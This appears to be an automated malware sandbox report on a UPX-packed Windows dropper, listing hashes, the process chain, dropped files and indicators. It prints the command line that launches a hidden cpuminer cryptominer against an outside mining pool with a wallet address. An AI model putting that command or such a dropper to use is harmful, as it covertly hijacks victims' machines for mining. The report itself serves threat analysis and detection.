73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
292s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18-02-2024 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1224	b2e.exe
2312	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2312	cpuminer-sse2.exe
2312	cpuminer-sse2.exe
2312	cpuminer-sse2.exe
2312	cpuminer-sse2.exe
2312	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1464-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1464 wrote to memory of 1224	1464	batexe.exe	74
PID 1464 wrote to memory of 1224	1464	batexe.exe	74
PID 1464 wrote to memory of 1224	1464	batexe.exe	74
PID 1224 wrote to memory of 5112	1224	b2e.exe	75
PID 1224 wrote to memory of 5112	1224	b2e.exe	75
PID 1224 wrote to memory of 5112	1224	b2e.exe	75
PID 5112 wrote to memory of 2312	5112	cmd.exe	78
PID 5112 wrote to memory of 2312	5112	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1464
- C:\Users\Admin\AppData\Local\Temp\BB80.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\BB80.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BB80.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BE5E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BB80.tmp\b2e.exe

Filesize
3.7MB

MD5
0f6d0de5a47b18669cf90fc78bb0866c

SHA1
0d33ae802f4955bc89a01ea370a30907434ef4d4

SHA256
c0c82fb3e10ac99b5820c6a750e3feeb07d4390f8aa2be4a5509ab05b44a00a8

SHA512
8ea1602652cc25d3910244036f3c0d6501de0edd3b78d88fa133fd51e7f6bfa49eecdfe0503e258f4c7e694f88510a97ab3c6159ec0820bd7a38689009e793b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB80.tmp\b2e.exe

Filesize
2.9MB

MD5
9317cafb85becd9011ca213e7be3a2bc

SHA1
1c84c389734da0532809700191b96dc61527e382

SHA256
644eb7fd5f540a11f942d00b2233e715a40b8548294924fc054db1e08b293090

SHA512
65120a9f1410f4b9350788c5898557be3d3b195f03b3425895748764fc052048f38998bb455cef4f25f748c696821a9a4622c8f09f6ae4603dcd6882be451684

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE5E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
971KB

MD5
fa25fad5105aa40bec56dfc4a3110786

SHA1
7dea3ba952b0dc8a5d68fe1055c78fe726e51daa

SHA256
0ddf731ab2332777812fb498982af147e4df7b41f7d399d2cbd80194a38fc3a1

SHA512
26f1f46ed02974410eaf891ba22c187220a1baaad845024d3be57dd10b733d94bbb0f6571d90c6fa37c01345498de224a289ebbe7b95c89e4e7d427350bc0594

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
933KB

MD5
2d9f3b3a72ab7496f191f1578f5d23ba

SHA1
78d6fc5ea95dfee05b4881ae4d7626d1d7d0a2e8

SHA256
3209e92b139514077ffd3fbcdfad8560ceb5ea77b94d1b04eaa757fc3bf6bbe8

SHA512
b72ce621e7dded358efea1303a945bcdf45c9da1957d5ec6015577bcdb623cd22a0c227940ec0fa5dec0b595d5523a571703a34af5beed50c99e5c5b60390cc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
720KB

MD5
0c9d300e0ebb4e50c5e4a15d1b79d352

SHA1
8fe36a2e51e52d534cc32ec5269527b8f19d9f60

SHA256
889af122e71d03984a1fe283f366626635f9ef1d702738d8fb181fbad2ee9691

SHA512
9832ef94dcc5daabb49fe356dc3c428f3c9096c727b4b7e9cb3dc170f7d6d53a5fa7157de884aa9d13a6b13179391018a8bb2baa040724a3f2a31a43cbe3397b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
672KB

MD5
56656cde7a26fd0e481c337f1b915c66

SHA1
25b4f80b3fac65f7edb43d357fb07d019e8b8238

SHA256
ffaadd7a0d67470626f88a42acfd0f2cd4d0b145f46c96e020e5b1412ebe71f0

SHA512
23d89e04aa67f1939a47b8b3d58fb1111aef952eff870efe2c7847943ff3f7228a38f6c9772a023bb6d053d9d73dcfe21d4133d02045e413ba0fe9f9bc4b093e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
824KB

MD5
000547b7f7ccefd85f23c85eb853ad7f

SHA1
254c336518f735caff028102c463db6aeba903d8

SHA256
a08765b08a9645a67a8e3a28ba21c67013cbca601dfd4c555d0e581774a2693f

SHA512
e62fed23489d3bf19c5236e23f95c9389c25e45a64893ca79fd7ded5154dea23f235eea70728289c359994b0ad352918a0c0d1563b2a8d17f3b884fd7a35f36c

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
578KB

MD5
089cc5a825ead6bb9055614dde8f5087

SHA1
461c8c6e1d4badc6fe82df92e2f5cdcb0f915d79

SHA256
79f64e47a38b611fba66fb287ccb69d17582a52550888d8252a3b1bb0140409a

SHA512
36722584bbde115843325c94f4d4073cbec7d6482b61033cf5746185743264414edc87b68578c69770c12fc019130182fa19245e2464e638f45c95a8be8be052

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
353KB

MD5
5b5a148536b7478cb781cf6cdbff8a46

SHA1
b2caae2da33305c288bf2647b2116b2d5cfc63d2

SHA256
13fad5e0b60395559e8a7f811603717011f7c44f99a9f5876d90bbda9f3d76c3

SHA512
fff83e71239eb904bc5068b9a6914940b2bb52a0059653eb149f212e363039a301faf5f81c0d673097b70c0e1ba7659e5b5ef1177f778093434394ce8ba945f6

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
896KB

MD5
4ece07a08273d0d0db84220926c3d32f

SHA1
d90712e2e643311a963676e87f6afad0c421d895

SHA256
d82c02350e5ca5ebe35d4349a16c3c9986aaecd8be71c05a00b1af09039a4cf3

SHA512
fa010b4c3c0e6d38bb281b4541c0e8b124e05d2feaa6dc11cb6e9c1d85145d5885a5cd61c1bca283f2d9f30295b197343311306acc9d5393aef64793067cdcab

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
668KB

MD5
d69538a0bbe0b4e8d31a6ff0be5f032e

SHA1
6116fb9f2b1aba30e0431b5ef7831a6e8fce04a5

SHA256
1df34918212df6250cce9cdfc54521177b4b56f2aae1711b3eef120fde06676a

SHA512
7e10289ba07409121ae1ae2151faae0387107f7b73eddb21a44fb119f998639ab149203c6fc45fe327de312e1d58a96400b2b49a3b378563b1639e35bfab3c27

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1224-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1224-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1464-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2312-44-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/2312-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2312-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2312-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-43-0x0000000073DA0000-0x0000000073E38000-memory.dmp

Filesize
608KB

Download
memory/2312-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2312-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download